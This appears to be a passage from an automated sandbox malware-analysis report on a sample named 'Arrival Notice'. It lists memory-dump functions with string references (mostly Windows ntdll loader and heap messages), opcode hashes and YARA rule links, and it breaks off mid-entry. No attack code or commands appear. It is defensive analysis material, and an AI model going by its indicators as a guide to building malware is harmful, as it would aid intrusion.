                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                              • API String ID: 0-4009184096
                                                                              • Opcode ID: 764e19e2d73d2d836fbee85357f5cf308314e5618436e46d099df889175abae5
                                                                              • Instruction ID: 4b1f9aeb06473279bfe83a8c462fd1ef0ab7417f0b56303831a8436c4a4c1b5e
                                                                              • Opcode Fuzzy Hash: 764e19e2d73d2d836fbee85357f5cf308314e5618436e46d099df889175abae5
                                                                              • Instruction Fuzzy Hash: 2C0270F1D402299BDB35DB54CC85BDEB7B8BB54304F4045DAA609AB241EB30AE84CF69
                                                                              Function 01618B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                              • API String ID: 0-2515994595
                                                                              • Opcode ID: ea785d100ce92043ce4c4bd4d6abfdb9aefbf1347f56a33a18b2a87607be0a02
                                                                              • Instruction ID: 87c1d1663bac6bec3ee35230f7c155c1534f9813ffde389b7462ab97b5046ce7
                                                                              • Opcode Fuzzy Hash: ea785d100ce92043ce4c4bd4d6abfdb9aefbf1347f56a33a18b2a87607be0a02
                                                                              • Instruction Fuzzy Hash: 5951C0B16043469BD725CF188C84BABBBECFFD8244F58491DE959C7245E770D604CB92
                                                                              Function 01620274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                              • API String ID: 0-1700792311
                                                                              • Opcode ID: c3fcee1f6e5f90af117ea986db2be9a6a35840676594a46347c59d1dd4afd4c6
                                                                              • Instruction ID: d76b99a89f96cb2a80ab47a7e5981cabce6b4bf9db8cfed55febf8acd91b1eab
                                                                              • Opcode Fuzzy Hash: c3fcee1f6e5f90af117ea986db2be9a6a35840676594a46347c59d1dd4afd4c6
                                                                              • Instruction Fuzzy Hash: 30D1CB31600AA6DFDB22DF68C840AADBBF5FF4A714F088059F845AB762C7359981CF54
                                                                              Function 015F89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • VerifierDlls, xrefs: 015F8CBD
                                                                              • VerifierFlags, xrefs: 015F8C50
                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 015F8A67
                                                                              • VerifierDebug, xrefs: 015F8CA5
                                                                              • HandleTraces, xrefs: 015F8C8F
                                                                              • AVRF: -*- final list of providers -*- , xrefs: 015F8B8F
                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015F8A3D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                              • API String ID: 0-3223716464
                                                                              • Opcode ID: fe4eaea42bf017648a4fb532db397ba6f2e240bde908a0e3d69114b78ae3cb87
                                                                              • Instruction ID: cd73c760ef5d27c187159b80006384c6d42345f698e75cacf1b222f9ff1c9d2a
                                                                              • Opcode Fuzzy Hash: fe4eaea42bf017648a4fb532db397ba6f2e240bde908a0e3d69114b78ae3cb87
                                                                              • Instruction Fuzzy Hash: E791FE72645706AFD722EF28CC81B1A7BE8BF94754F44485DFB82AF294D770AC0487A1
                                                                              Function 0157EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                              • API String ID: 0-1109411897
                                                                              • Opcode ID: b8b78eb4dd29bc64bffa846a29dd23c5658e06f2e03582105186c2dfcd1bd82a
                                                                              • Instruction ID: 8cc97e6b586e1f39ce5a34423638c811f1fa9b3b7d81dfa32b1e8e4f4ac2efb9
                                                                              • Opcode Fuzzy Hash: b8b78eb4dd29bc64bffa846a29dd23c5658e06f2e03582105186c2dfcd1bd82a
                                                                              • Instruction Fuzzy Hash: 6BA24574A0562A8FDB74CF18D8897ADBBB5BF85304F1446EAD919AB650DB309EC1CF00
                                                                              Function 015A63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-792281065
                                                                              • Opcode ID: 7791e66feb0b42e49e1565ee4ddff3ee07cf2c2a4034fc5ce1a86e0d51b0ab0d
                                                                              • Instruction ID: 94901ebf2f856241e2290d13982eecd1ed09c22e02e7e06a4e1707cd06cd74de
                                                                              • Opcode Fuzzy Hash: 7791e66feb0b42e49e1565ee4ddff3ee07cf2c2a4034fc5ce1a86e0d51b0ab0d
                                                                              • Instruction Fuzzy Hash: 3F912771E40312DBEB29DF58DC89BAE7BE1BB90B54F48002DD905AF291D7749801C7A4
                                                                              Function 0156645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015C9A01
                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015C99ED
                                                                              • LdrpInitShimEngine, xrefs: 015C99F4, 015C9A07, 015C9A30
                                                                              • apphelp.dll, xrefs: 01566496
                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015C9A2A
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015C9A11, 015C9A3A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-204845295
                                                                              • Opcode ID: 542b1e100f1d4ca7e4f30b5e07568b6b945411098c43e1f8d0d31b3b682bb14e
                                                                              • Instruction ID: 0ccce4e2c2b9a833830851b969d792f4b6cc6aec97de655e0368fffea90baa6b
                                                                              • Opcode Fuzzy Hash: 542b1e100f1d4ca7e4f30b5e07568b6b945411098c43e1f8d0d31b3b682bb14e
                                                                              • Instruction Fuzzy Hash: FC5190712183059FD724DF68CC52BAB77E8FB84B48F40091EF5859F260D6B0E944CB92
                                                                              Function 015A2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015E21BF
                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015E219F
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015E2180
                                                                              • SXS: %s() passed the empty activation context, xrefs: 015E2165
                                                                              • RtlGetAssemblyStorageRoot, xrefs: 015E2160, 015E219A, 015E21BA
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015E2178
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                              • API String ID: 0-861424205
                                                                              • Opcode ID: 608ca0020e479c0a177762c2f48be8ba633cd97901dc957d4da8f1231eed2ed0
                                                                              • Instruction ID: 83017e47a279426fe145982f33dfeed7e860016f4314dff385ee3f56e0d3b5ad
                                                                              • Opcode Fuzzy Hash: 608ca0020e479c0a177762c2f48be8ba633cd97901dc957d4da8f1231eed2ed0
                                                                              • Instruction Fuzzy Hash: D031073AF80215B7E7298A998C46F5E7BB9FB95A50F45005EFB04AF244D270DB00C7A1
                                                                              Function 015AC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015E8181, 015E81F5
                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 015E81E5
                                                                              • LdrpInitializeImportRedirection, xrefs: 015E8177, 015E81EB
                                                                              • Loading import redirection DLL: '%wZ', xrefs: 015E8170
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015AC6C3
                                                                              • LdrpInitializeProcess, xrefs: 015AC6C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-475462383
                                                                              • Opcode ID: 21d88cbfc836d8d2fb99b10dfa70169c088188fdc651bd241679e3db2c5e0600
                                                                              • Instruction ID: c684f825259619b492767e9b855d7b9a2bbb3466deee4f60222b8284283189e1
                                                                              • Opcode Fuzzy Hash: 21d88cbfc836d8d2fb99b10dfa70169c088188fdc651bd241679e3db2c5e0600
                                                                              • Instruction Fuzzy Hash: C231E0B1A447039BD324EF28DD4AE2ABBD4FBD4B14F000518F945AF291E660EC04C7A2
                                                                              Function 015B096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 015B2DF0: LdrInitializeThunk.NTDLL ref: 015B2DFA
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0BA3
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0BB6
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0D60
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0D74
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 1404860816-0
                                                                              • Opcode ID: c50d12992be1138470959b4d544fe1556e644ce64ace60dd3527b36055c534de
                                                                              • Instruction ID: 9f707ccfc29dc553fb228b6e230f1be22fc7e920ce5627ca849873b221aa616c
                                                                              • Opcode Fuzzy Hash: c50d12992be1138470959b4d544fe1556e644ce64ace60dd3527b36055c534de
                                                                              • Instruction Fuzzy Hash: 13425A71900716DFDB25CF28C884BEAB7F5BF44314F1445A9E989EB281E770AA84CF61
                                                                              Function 0157A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                              • API String ID: 0-379654539
                                                                              • Opcode ID: c3e6d0a70d08fd3f686de9d3e9f22cda89b3895f6bafbdb989a04dfce3100407
                                                                              • Instruction ID: 90979a0b319eee53aa5ab06f9e42833eafafe10fb8c736621889a1fa11894903
                                                                              • Opcode Fuzzy Hash: c3e6d0a70d08fd3f686de9d3e9f22cda89b3895f6bafbdb989a04dfce3100407
                                                                              • Instruction Fuzzy Hash: EDC18871508382CFDB21CF58D045B6EB7E4BF84704F08896AF9968F251E735DA49CB62
                                                                              Function 015A8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • @, xrefs: 015A8591
                                                                              • LdrpInitializeProcess, xrefs: 015A8422
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015A8421
                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015A855E
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1918872054
                                                                              • Opcode ID: 4cec545773eb3f4c33f820088c9a8827f249679a07abd45f4d264f4d97089830
                                                                              • Instruction ID: 58469d66739868a17453bb913d3eec7bd7ecba836bc0e74922b11e0b1e6e21fd
                                                                              • Opcode Fuzzy Hash: 4cec545773eb3f4c33f820088c9a8827f249679a07abd45f4d264f4d97089830
                                                                              • Instruction Fuzzy Hash: 6F917171558346AFD721EF25CC85EAFBAE8BF88744F40092DFA849A151E730D944CB62
                                                                              Function 015A273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015E21D9, 015E22B1
                                                                              • .Local, xrefs: 015A28D8
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015E22B6
                                                                              • SXS: %s() passed the empty activation context, xrefs: 015E21DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                              • API String ID: 0-1239276146
                                                                              • Opcode ID: dd661199b72a0648ba5562fd90351f970415c4b217a5dbcde3ce339a9c668f81
                                                                              • Instruction ID: dce63a4f20059bf22b4b01ebea0cc6af66f13b04fd2bad0dd63e089350f74266
                                                                              • Opcode Fuzzy Hash: dd661199b72a0648ba5562fd90351f970415c4b217a5dbcde3ce339a9c668f81
                                                                              • Instruction Fuzzy Hash: 2CA19B3194022A9FDB24CF68C889BADB7B5BF58754F5445EAD908AF251D7309EC0CF90
                                                                              Function 015A4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015E3456
                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015E342A
                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015E3437
                                                                              • RtlDeactivateActivationContext, xrefs: 015E3425, 015E3432, 015E3451
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                              • API String ID: 0-1245972979
                                                                              • Opcode ID: c86cb315e26ea9d6a94a45341639ae8881592ea7336db3706007202d16b2884f
                                                                              • Instruction ID: f8bafbbe7c22f1c67586bc288d3649c00b94dc674fb94ae6ef26c505af8ad3d0
                                                                              • Opcode Fuzzy Hash: c86cb315e26ea9d6a94a45341639ae8881592ea7336db3706007202d16b2884f
                                                                              • Instruction Fuzzy Hash: 40612136A907129FD766CF5CC859B2EB7E1BF80B10F58852DE9599F240D7B0E801CB91
                                                                              Function 015764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015D106B
                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015D1028
                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015D0FE5
                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015D10AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                              • API String ID: 0-1468400865
                                                                              • Opcode ID: 43c83280dfef16ea6db6327231b9ab4e3d14ae1e082ef16c4fd5f7821510ed42
                                                                              • Instruction ID: cc1be4ac2f6511af9011017ff8f01335362990b6ef48eecfc36329c5dee19ba5
                                                                              • Opcode Fuzzy Hash: 43c83280dfef16ea6db6327231b9ab4e3d14ae1e082ef16c4fd5f7821510ed42
                                                                              • Instruction Fuzzy Hash: 6F71F0B19047069FDB20DF18C885B9B7FA8BF95764F400469F9488F286D334D588DBD2
                                                                              Function 0159245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • LdrpDynamicShimModule, xrefs: 015DA998
                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015DA992
                                                                              • apphelp.dll, xrefs: 01592462
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DA9A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-176724104
                                                                              • Opcode ID: 5de390e53500abfbb15654d97cdb96317f3152925fc4121d621acd6de0a6f360
                                                                              • Instruction ID: da41944b9ab55a3493e3e009f2189e13f83bd73162bd87ebba615d504fa9b808
                                                                              • Opcode Fuzzy Hash: 5de390e53500abfbb15654d97cdb96317f3152925fc4121d621acd6de0a6f360
                                                                              • Instruction Fuzzy Hash: 4C312676A00202EBDB319F6DDC85AAE7BB4FBC4B04F16001DE915AF265C7B09951CB91
                                                                              Function 015829A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • HEAP: , xrefs: 01583264
                                                                              • HEAP[%wZ]: , xrefs: 01583255
                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0158327D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                              • API String ID: 0-617086771
                                                                              • Opcode ID: c5a3fa0fd47d983056d417969284b890694cbc6ade4dadf88253a238adeaf21b
                                                                              • Instruction ID: 86bddf520398bd18b1f851598a788fb8bbf93d252c6277ad0d46f9eace8e599a
                                                                              • Opcode Fuzzy Hash: c5a3fa0fd47d983056d417969284b890694cbc6ade4dadf88253a238adeaf21b
                                                                              • Instruction Fuzzy Hash: 89929A70A042499FDB25DF68C444BAEBFF1FF48704F188499E85AAF291D735A941CF50
                                                                              Function 01580770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-4253913091
                                                                              • Opcode ID: 50e6f26208e0e784e5dc447ecadfbec6e15f8aceec369d27198880e9d2da52b1
                                                                              • Instruction ID: 799f420426a6c0b375607d391e83c80c9a1bc3edaba5ab96f8d13659d43fcaac
                                                                              • Opcode Fuzzy Hash: 50e6f26208e0e784e5dc447ecadfbec6e15f8aceec369d27198880e9d2da52b1
                                                                              • Instruction Fuzzy Hash: B6F18930A10606DFEB25EF68C894B6EB7F5FB44304F148568E556AF391D730E985CB90
                                                                              Function 01596962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $@
                                                                              • API String ID: 0-1077428164
                                                                              • Opcode ID: 6b194f6f534796efa9cb311786bea8b1f6d84df4d9e6f62fa9ac1c128711c0ce
                                                                              • Instruction ID: 747c8e90c42204938227da6144ae0877a4ab4eda93e0b994856a3a7cd40ae48b
                                                                              • Opcode Fuzzy Hash: 6b194f6f534796efa9cb311786bea8b1f6d84df4d9e6f62fa9ac1c128711c0ce
                                                                              • Instruction Fuzzy Hash: 66C25D716183419FEB25CF29C881BAFBBE5BF88754F04892EE9898B241D734D845CB53
                                                                              Function 0156A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                              • API String ID: 0-2779062949
                                                                              • Opcode ID: 90303deb71053b27233264f958aa08671473f969cf053da53373df8d54f1f409
                                                                              • Instruction ID: 5f2a59d33538170b735ca1312295f648e9860f6f29289aed9a678c000e15ecfc
                                                                              • Opcode Fuzzy Hash: 90303deb71053b27233264f958aa08671473f969cf053da53373df8d54f1f409
                                                                              • Instruction Fuzzy Hash: FBA12B7191162A9FDB319F68CC88BA9B7B8FF44B10F1041E9D90DAB250E735AE85CF50
                                                                              Function 01590BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Failed to allocated memory for shimmed module list, xrefs: 015DA10F
                                                                              • LdrpCheckModule, xrefs: 015DA117
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DA121
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-161242083
                                                                              • Opcode ID: daf81fba2aee3fd43ea16abaf0b0a359941e88d3186152e5c3451c6afdf0eb88
                                                                              • Instruction ID: bbde79a04d3853e2d6181f5642319d278b1dafa08263f9fed7adcc96e22adf81
                                                                              • Opcode Fuzzy Hash: daf81fba2aee3fd43ea16abaf0b0a359941e88d3186152e5c3451c6afdf0eb88
                                                                              • Instruction Fuzzy Hash: 0D719E71A00206DFDF25EF68CD81ABEB7F8FB84604F14486DE906AF295E734A941CB51
                                                                              Function 01580A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
